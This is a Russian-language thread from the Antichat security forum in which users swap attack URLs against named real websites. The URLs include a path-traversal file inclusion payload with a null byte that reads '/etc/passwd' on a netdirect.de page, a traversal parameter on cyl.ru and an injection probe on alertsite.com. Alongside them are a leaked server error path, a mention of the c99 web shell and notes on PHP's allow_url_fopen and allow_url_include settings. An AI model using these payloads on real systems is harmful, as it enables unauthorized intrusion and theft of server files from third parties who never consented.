ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Хм, может ты нам по коду покажешь где ты там include() увидел?

http://www.cyl.ru/index.php?page=3&lang=../index.php%00

)) Да, там file, готов понести самое жестокое наказание и впредь думать, прежде чем писать

Grey: ну тогда начинай подготовку к наказанию - запасись хАААрошей клизмой.

Народ,кто-нибудь может показать пример обхода инклуда на этом сайте?

http://www.alertsite.com/phplive/image.php?l=ml'&x=1&deptid=0

Классический пример имхо
Переменная l

Мде...как-то не подумал.Но какие-то преимущества давались,блин...

Warning: getimagesize(/usr/virtualweb/netdirekt.de/html/c/cms/images/index_-over.jpg): failed to open stream: No such file or directory in /usr/virtualweb/netdirekt.de/html/c/cms/front_content.php(884) : eval()'d code on line 520

Здесь,я так понял,ничего не сделаешь)

http://www.netdirect.de/c/cms/front_content.php?idart=132&idcat=../../../../../../../../../../etc/passwd%00

Какой смысл отрубать allow_url_fopen() тогда,если это не влечёт проблем с безопасностью ? Прихоть такая чтоли ?

очень понятно расписано, особенно для обожателей с99шелла :

Какой смысл отрубать allow_url_fopen() тогда,если это не влечёт проблем с безопасностью ? Прихоть такая чтоли ?

до каких то там версий пшп (5.0.* чёто такое) allow_url_fopen растространялось и на file() и на include(), потом ввели allow_url_include

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

allow_url_include "0" PHP_INI_ALL PHP_INI_SYSTEM in PHP 5. Available since PHP 5.2.0.

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Тык инклуд работает ?)